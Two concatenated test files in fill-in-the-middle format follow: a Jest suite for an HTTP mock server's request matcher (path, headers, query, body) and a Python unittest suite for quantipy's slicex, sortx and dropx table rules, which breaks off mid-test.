<|file_name|>matcher.spec.js<|end_file_name|><|fim▁begin|>const matcher = require('../lib/matcher'); describe('Matcher', () => { describe('path', () => { let mock; let request; beforeEach(() => { mock = { request: { path: '/test' } }; request = { originalUrl: '/test?blah=test', path: '/test' }; }); test('should return true if request path exactly matches mock request path', () => { expect(matcher.path(mock, request)).toBe(true); }); test('should return true if request path matches mock request greedy path', () => { mock.request.path = '/test/*'; request.path = '/test/anything'; expect(matcher.path(mock, request)).toBe(true); }); test('should return true if request path matches mock request named path', () => { mock.request.path = '/test/:named/end'; request.path = '/test/anything/end'; expect(matcher.path(mock, request)).toBe(true); }); test('should return false if request path does not match mock request named path', () => { mock.request.path = '/test/:named/end'; request.path = '/this/will/never/match'; expect(matcher.path(mock, request)).toBe(false); }); }); describe('headers', () => { let mock; let request; beforeEach(() => { mock = { request: { headers: { test: 'this' } } }; request = { headers: { test: 'this' } }; }); test('should return true if request headers exactly match mock request headers', () => { expect(matcher.headers(mock, request)).toBe(true); }); test('should return true if request headers contain the mock request headers', () => { request.headers.another = 'glah'; expect(matcher.headers(mock, request)).toBe(true); }); test('should return false if request headers do not match the mock request header values', () => { request.headers = { test: 'nope' }; expect(matcher.headers(mock, request)).toBe(false); }); test('should return false if request headers do not contain the mock request header values', () => { request.headers = { another: 'header' }; expect(matcher.headers(mock, request)).toBe(false); }); }); describe('query', () => { let mock; let request; <|fim▁hole|> query: { test: 'this' } } }; request = { query: { test: 'this' } }; }); test('should return true if mock has no query specified', () => { delete mock.request.query; expect(matcher.query(mock, request)).toBe(true); }); test('should return true if mock has empty query specified', () => { delete mock.request.query.test; expect(matcher.query(mock, request)).toBe(true); }); test('should return true if request query exactly match mock request query', () => { expect(matcher.query(mock, request)).toBe(true); }); test('should return true if request query contain the mock request query', () => { request.query.another = 'glah'; expect(matcher.query(mock, request)).toBe(true); }); test('should return false if request query does not match the mock request header values', () => { request.query = { test: 'nope' }; expect(matcher.query(mock, request)).toBe(false); }); test('should return false if request query does not contain the mock request header values', () => { request.query = { another: 'header' }; expect(matcher.query(mock, request)).toBe(false); }); test('RegExp - should return true if request query matches', () => { mock.request.query.email = { type: 'regex', value: '.*?@bar\.com' }; request.query = { test: 'this', email: '[email protected]' }; expect(matcher.query(mock, request)).toBe(true); }); }); describe('body', () => { let mock; let request; beforeEach(() => { mock = { request: { body: { test: 'this' } } }; request = { body: { test: 'this' } }; }); test('should return true if request body exactly match mock request body', () => { expect(matcher.body(mock, request)).toBe(true); }); test('should return true if request body contain the mock request body', () => { request.body.another = 'glah'; expect(matcher.body(mock, request)).toBe(true); }); test('should return false if request body does not match the mock request header values', () => { request.body = { test: 'nope' }; expect(matcher.body(mock, request)).toBe(false); }); test('should return false if request body does not contain the mock request header values', () => { request.body = { another: 'field' }; expect(matcher.body(mock, request)).toBe(false); }); }); });<|fim▁end|>
beforeEach(() => { mock = { request: {
<|file_name|>test_rules.py<|end_file_name|><|fim▁begin|>import unittest import os.path import numpy as np import pandas as pd from pandas.util.testing import assert_frame_equal import test_helper import copy from operator import lt, le, eq, ne, ge, gt from pandas.core.index import Index __index_symbol__ = { Index.union: ',', Index.intersection: '&', Index.difference: '~', Index.sym_diff: '^' } from collections import defaultdict, OrderedDict from quantipy.core.stack import Stack from quantipy.core.chain import Chain from quantipy.core.link import Link from quantipy.core.view_generators.view_mapper import ViewMapper from quantipy.core.view_generators.view_maps import QuantipyViews from quantipy.core.view import View from quantipy.core.helpers import functions from quantipy.core.helpers.functions import load_json from quantipy.core.tools.dp.prep import ( frange, frequency, crosstab ) from quantipy.core.tools.view.query import get_dataframe from quantipy.core.dataset import DataSet EXTENDED_TESTS = False COUNTER = 0 class TestRules(unittest.TestCase): def setUp(self): self.path = './tests/' project_name = 'Example Data (A)' # Load Example Data (A) data and meta into self name_data = '%s.csv' % (project_name) path_data = '%s%s' % (self.path, name_data) self.example_data_A_data = pd.DataFrame.from_csv(path_data) name_meta = '%s.json' % (project_name) path_meta = '%s%s' % (self.path, name_meta) self.example_data_A_meta = load_json(path_meta) # Variables by type for Example Data A self.dk = 'Example Data (A)' self.fk = 'no_filter' self.single = ['gender', 'locality', 'ethnicity', 'religion', 'q1'] self.delimited_set = ['q2', 'q3', 'q8', 'q9'] self.q5 = ['q5_1', 'q5_2', 'q5_3'] def test_slicex(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' ################## values meta['columns'][col_x]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_x, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_y, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) def _get_dataset(self): meta = self.example_data_A_meta data = self.example_data_A_data dataset = DataSet('rules_test') dataset.set_verbose_infomsg(False) dataset.from_components(data, meta) return dataset def _get_stack_with_links(self, dataset, x=None, y=None, w=None): stack = Stack() stack.add_data(dataset.name, dataset._data, dataset._meta) if not x: x = '@' if not y: y = '@' stack.add_link(x=x, y=y, weights=w) return stack def test_sortx_summaries_mean(self): dataset = self._get_dataset() x = 'q5' y = '@' dataset.sorting(x, on='mean') stack = self._get_stack_with_links(dataset, x) stack.add_link(x=x, y=y, views=['cbase', 'counts', 'c%', 'mean']) vks = ['x|f|x:|||cbase', 'x|f|:|||counts', 'x|f|:|y||c%', 'x|d.mean|x:|||mean'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=[y], rules=True, views=vks, orient_on='x') chain = chains[0] for vk in vks: v = chain['rules_test']['no_filter'][x][y][vk] l = stack['rules_test']['no_filter'][x][y][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = ['q5_4', 'q5_6', 'q5_1', 'q5_3', 'q5_5', 'q5_2'] self.assertEqual(actual_order, expected_order) def test_sortx_summaries_value(self): dataset = self._get_dataset() x = 'q5' y = '@' dataset.sorting(x, on=3, ascending=True) stack = self._get_stack_with_links(dataset, x) stack.add_link(x=x, y=y, views=['cbase', 'counts', 'c%', 'mean']) vks = ['x|f|x:|||cbase', 'x|f|:|||counts', 'x|f|:|y||c%', 'x|d.mean|x:|||mean'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=[y], rules=True, views=vks, orient_on='x') chain = chains[0] for vk in vks: v = chain['rules_test']['no_filter'][x][y][vk] l = stack['rules_test']['no_filter'][x][y][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = ['q5_4', 'q5_5', 'q5_6', 'q5_1', 'q5_3', 'q5_2'] self.assertEqual(actual_order, expected_order) def test_sortx_summaries_items(self): dataset = self._get_dataset() x = '@' y = 'q5' dataset.sorting(y, on='q5_2', ascending=False) stack = self._get_stack_with_links(dataset, y=y) stack.add_link(x=x, y=y, views=['cbase', 'counts', 'c%', 'mean']) vks = ['x|f|x:|||cbase', 'x|f|:|||counts', 'x|f|:|y||c%', 'x|d.mean|x:|||mean'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=[y], rules=True, views=vks, orient_on='x') chain = chains[0] for vk in vks: v = chain['rules_test']['no_filter'][x][y][vk] l = stack['rules_test']['no_filter'][x][y][vk] if not 'd.mean' in vk and not 'cbase' in vk: check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = [3, 5, 98, 2, 1, 97, 4] self.assertEqual(actual_order, expected_order) def test_sortx_expand_net_within(self): dataset = self._get_dataset() x = 'q2' y = ['@', 'gender'] dataset.sorting(x, on='@', within=True, between=False, fix=98) stack = self._get_stack_with_links(dataset, x=x, y=y) net = [{'test A': [1, 2, 3], 'text': {'en-GB': 'Lab1'}}, {'test B': [5, 6, 97], 'text': {'en-GB': 'Lab2'}}] net_view = ViewMapper().make_template('frequency') view_name = 'expandnet' options = {'logic': net, 'expand': 'after', 'complete': True, 'axis': 'x', 'iterators': {'rel_to': [None, 'y']}} net_view.add_method(view_name, kwargs=options) stack.add_link(x=x, y=y, views=net_view) vks = ['x|f|x[{1,2,3}+],x[{5,6,97}+]*:|||expandnet', 'x|f|x[{1,2,3}+],x[{5,6,97}+]*:|y||expandnet'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=y, rules=True, views=vks, orient_on='x') chain = chains[0] for yk in y: for vk in vks: v = chain['rules_test']['no_filter'][x][yk][vk] l = stack['rules_test']['no_filter'][x][yk][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = ['test A', 3, 2, 1, 4, 'test B', 97, 5, 6, 98] self.assertEqual(actual_order, expected_order) def test_sortx_expand_net_between(self): dataset = self._get_dataset() x = 'q2' y = ['@', 'gender'] dataset.sorting(x, on='@', within=False, between=True, ascending=True, fix=98) stack = self._get_stack_with_links(dataset, x=x, y=y) net = [{'test A': [1, 2, 3], 'text': {'en-GB': 'Lab1'}}, {'test B': [5, 6, 97], 'text': {'en-GB': 'Lab2'}}] net_view = ViewMapper().make_template('frequency') view_name = 'expandnet' options = {'logic': net, 'expand': 'after', 'complete': True, 'axis': 'x', 'iterators': {'rel_to': [None, 'y']}} net_view.add_method(view_name, kwargs=options) stack.add_link(x=x, y=y, views=net_view) vks = ['x|f|x[{1,2,3}+],x[{5,6,97}+]*:|||expandnet', 'x|f|x[{1,2,3}+],x[{5,6,97}+]*:|y||expandnet'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=y, rules=True, views=vks, orient_on='x') chain = chains[0] for yk in y: for vk in vks: v = chain['rules_test']['no_filter'][x][yk][vk] l = stack['rules_test']['no_filter'][x][yk][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = [4, 'test B', 5, 6, 97, 'test A', 1, 2, 3, 98] self.assertEqual(actual_order, expected_order) def test_sortx_expand_net_within_between(self): dataset = self._get_dataset() x = 'q2' y = ['@', 'gender'] dataset.sorting(x, on='@', within=True, between=True, ascending=False, fix=98) stack = self._get_stack_with_links(dataset, x=x, y=y) net = [{'test A': [1, 2, 3], 'text': {'en-GB': 'Lab1'}}, {'test B': [5, 6, 97], 'text': {'en-GB': 'Lab2'}}] net_view = ViewMapper().make_template('frequency') view_name = 'expandnet' options = {'logic': net, 'expand': 'after', 'complete': True, 'axis': 'x', 'iterators': {'rel_to': [None, 'y']}} net_view.add_method(view_name, kwargs=options) stack.add_link(x=x, y=y, views=net_view) test_view = ViewMapper().make_template('coltests') view_name = 'test' options = {'level': 0.2} test_view.add_method(view_name, kwargs=options) stack.add_link(x=x, y=y, views=test_view) vks = ['x|f|x[{1,2,3}+],x[{5,6,97}+]*:|||expandnet', 'x|f|x[{1,2,3}+],x[{5,6,97}+]*:|y||expandnet', 'x|t.props.Dim.20|x[{1,2,3}+],x[{5,6,97}+]*:|||test'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=y, rules=True, views=vks, orient_on='x') chain = chains[0] for yk in y: for vk in vks: v = chain['rules_test']['no_filter'][x][yk][vk] l = stack['rules_test']['no_filter'][x][yk][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = ['test A', 3, 2, 1, 'test B', 97, 5, 6, 4, 98] self.assertEqual(actual_order, expected_order) def test_sortx(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' ################## sort_on - default meta['columns'][col_x]['rules'] = {'x': {'sortx': {}}} meta['columns'][col_y]['rules'] = {'y': {'sortx': {}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9]), 'iswtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 15, 12, 3, 11, 14, 6, 8, 10, 9, 5, 4, 13]), 'iswtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 6, 4, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## sort_on - '@' meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'sort_on': '@'}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'sort_on': '@'}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9]), 'iswtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 15, 12, 3, 11, 14, 6, 8, 10, 9, 5, 4, 13]), 'iswtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 6, 4, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## fixed meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col_x, all=True, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 16, 7, 15, 12, 3, 11, 14, 8, 10, 9, 5, 13, 6, 2, 4]), 'iswtd': index_items(col_y, all=True, values=[1, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 13, 6, 2, 4])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## with_weight meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'with_weight': 'weight_b'}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'with_weight': 'weight_b'}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 12, 6, 10, 14, 11, 7, 13, 9, 8]), 'iswtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 12, 6, 10, 14, 11, 7, 13, 9, 8])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 11, 3, 12, 15, 8, 9, 10, 5, 14, 6, 4, 13]), 'iswtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 11, 3, 12, 15, 8, 9, 10, 5, 14, 6, 4, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) def test_dropx(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' ################## values meta['columns'][col_x]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_x, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_y, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) def test_rules_frequency(self): meta = self.example_data_A_meta data = self.example_data_A_data col = 'religion' ################## slicex meta['columns'][col]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 10, 11, 13, 15]}}, 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[1, 3, 5, 7, 9, 10, 11, 13, 15]), 'iswtd': index_items(col, all=True, values=[1, 3, 5, 7, 9, 10, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## sortx meta['columns'][col]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}, 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col, all=True, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[1, 3, 15, 5, 16, 10, 12, 14, 11, 7, 13, 8, 9, 6, 2, 4]), 'iswtd': index_items(col, all=True, values=[1, 3, 15, 5, 16, 12, 10, 14, 11, 7, 13, 9, 8, 6, 2, 4])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## dropx meta['columns'][col]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}, 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## slicex + sortx meta['columns'][col]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [1, 2]}}, 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [15, 16]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[4, 5, 6, 10, 12, 11, 7, 13, 8, 9, 1, 2]), 'iswtd': index_items(col, all=True, values=[4, 5, 6, 12, 10, 11, 7, 13, 9, 8, 1, 2])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[10, 12, 14, 11, 7, 13, 8, 9, 15, 16]), 'iswtd': index_items(col, all=True, values=[12, 10, 14, 11, 7, 13, 9, 8, 15, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## slicex + dropx meta['columns'][col]['rules'] = { 'x': { 'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}, 'dropx': {'values': [3, 7, 11, 15]}}, 'y': { 'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}, 'dropx': {'values': [2, 6, 10, 14]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[1, 5, 9, 13]), 'iswtd': index_items(col, all=True, values=[1, 5, 9, 13])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[4, 8, 12, 16]), 'iswtd': index_items(col, all=True, values=[4, 8, 12, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## sortx + dropx meta['columns'][col]['rules'] = { 'x': { 'sortx': {'fixed': [1, 2]}, 'dropx': {'values': [5, 11, 13]}}, 'y': { 'sortx': {'fixed': [15, 16]}, 'dropx': {'values': [7, 13, 14]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[3, 15, 4, 16, 6, 10, 12, 14, 7, 8, 9, 1, 2]), 'iswtd': index_items(col, all=True, values=[3, 15, 4, 16, 6, 12, 10, 14, 7, 9, 8, 1, 2])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[2, 1, 3, 4, 5, 6, 10, 12, 11, 8, 9, 15, 16]), 'iswtd': index_items(col, all=True, values=[2, 1, 3, 4, 5, 6, 12, 10, 11, 9, 8, 15, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## slicex + sortx + dropx meta['columns'][col]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [11, 13]}, 'dropx': {'values': [7]}}, 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [15, 16]}, 'dropx': {'values': [7, 13]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[4, 5, 6, 10, 12, 8, 9, 11, 13]), 'iswtd': index_items(col, all=True, values=[4, 5, 6, 12, 10, 9, 8, 11, 13])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[10, 12, 14, 11, 8, 9, 15, 16]), 'iswtd': index_items(col, all=True, values=[12, 10, 14, 11, 9, 8, 15, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) def test_rules_crosstab(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' ################## slicex + sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [6, 11]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [11, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[5, 10, 12, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=True, values=[5, 12, 10, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[15, 12, 14, 8, 10, 9, 7, 13]), 'iswtd': index_items(col_y, all=True, values=[12, 15, 8, 9, 10, 14, 7, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) if EXTENDED_TESTS: ################## slicex meta['columns'][col_x]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 10, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[1, 3, 5, 7, 9, 10, 11, 13, 15]), 'iswtd': index_items(col_x, all=True, values=[1, 3, 5, 7, 9, 10, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_y, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## sortx meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col_x, all=True, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 16, 7, 15, 12, 3, 11, 14, 8, 10, 9, 5, 13, 6, 2, 4]), 'iswtd': index_items(col_y, all=True, values=[1, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 13, 6, 2, 4])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## dropx meta['columns'][col_x]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_x, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_y, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## slicex + sortx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[5, 6, 10, 12, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=True, values=[5, 6, 12, 10, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[16, 15, 12, 14, 8, 10, 9, 7, 11, 13]), 'iswtd': index_items(col_y, all=True, values=[16, 12, 15, 8, 9, 10, 14, 7, 11, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## slicex + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}, 'dropx': {'values': [3, 7, 11, 15]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}, 'dropx': {'values': [2, 6, 10, 14]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[1, 5, 9, 13]), 'iswtd': index_items(col_x, all=True, values=[1, 5, 9, 13])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[4, 8, 12, 16]), 'iswtd': index_items(col_y, all=True, values=[4, 8, 12, 16])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [5, 10]}}} meta['columns'][col_y]['rules'] = { 'y': { 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [4, 12]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=True, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 2, 16, 15, 3, 14, 6, 8, 10, 9, 5, 7, 11, 13]), 'iswtd': index_items(col_y, all=True, values=[1, 2, 16, 3, 15, 8, 9, 10, 14, 5, 6, 7, 11, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) def test_rules_get_dataframe(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' xks = [col_x] yks = ['@', col_y] test_views = [ 'cbase', 'rbase', # 'ebase', 'counts', 'c%', 'r%', 'mean'] weights = [None, 'weight_a'] ################## slicex + sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [6, 11]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [11, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[5, 10, 12, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[5, 12, 10, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[15, 12, 14, 8, 10, 9, 7, 13]), 'iswtd': index_items(col_y, all=False, values=[12, 15, 8, 9, 10, 14, 7, 13])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) if EXTENDED_TESTS: ################## slicex meta['columns'][col_x]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 10, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[1, 3, 5, 7, 9, 10, 11, 13, 15]), 'iswtd': index_items(col_x, all=False, values=[1, 3, 5, 7, 9, 10, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16]), 